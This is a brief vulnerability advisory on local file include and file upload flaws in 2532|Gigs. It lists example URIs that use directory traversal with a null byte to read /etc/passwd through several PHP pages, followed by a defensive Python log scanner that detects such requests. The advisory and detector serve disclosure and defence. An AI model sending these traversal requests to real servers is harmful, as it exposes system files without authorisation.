2532designs 2532|Gigs Local File Include and Arbitrary File Upload Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/[path]/settings.php?language=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/deleteuser.php?language=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/mini_calendar?language=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/manage_venues.php?language=../../../../../../../../../../etc/passwd%00
http://www.example.com/[path]/manage_gigs.php?language=../../../../../../../../../../etc/passwd%00
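
A defender-side check for the request pattern in the URIs above, as an added example that is not part of the original advisory: it scans web-server access-log lines for a `language` query parameter carrying directory traversal or an encoded null byte. The log lines are constructed samples, and the function names and the allowlist pattern for legitimate language values are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2010:10:00:00 +0000] "GET /gigs/settings.php?language=english HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2010:10:00:05 +0000] "GET /gigs/settings.php?language=../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '203.0.113.9 - - [01/Jan/2010:10:00:09 +0000] "GET /gigs/manage_gigs.php?language=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1843',
    '203.0.113.4 - - [01/Jan/2010:10:01:00 +0000] "GET /gigs/manage_venues.php?page=2 HTTP/1.1" 200 900',
]
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate language values are short plain names such as "english".
SAFE_VALUE_RE = re.compile(r'^[A-Za-z0-9_-]{1,32}$')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input (%252f) is normalised."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(value):
    """Return the reasons a `language` value is suspicious (empty list if clean)."""
    v = fully_decode(value)
    reasons = []
    if '\x00' in v:
        reasons.append('null-byte')
    if '..' in v.replace('\\', '/').split('/'):
        reasons.append('traversal')
    if not reasons and not SAFE_VALUE_RE.match(v):
        reasons.append('not-allowlisted')
    return reasons

def scan(lines):
    """Return (client_ip, path, reasons) for every flagged request line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else urlsplit('')
        for key, raw in parse_qsl(url.query, keep_blank_values=True):
            reasons = classify(raw) if key == 'language' else []
            if reasons:
                hits.append((line.split()[0], url.path, reasons))
    return hits

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same `classify` logic can be applied at the application boundary to reject a `language` value before it reaches any file-loading code.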


 

Copyright 2010, SecurityFocus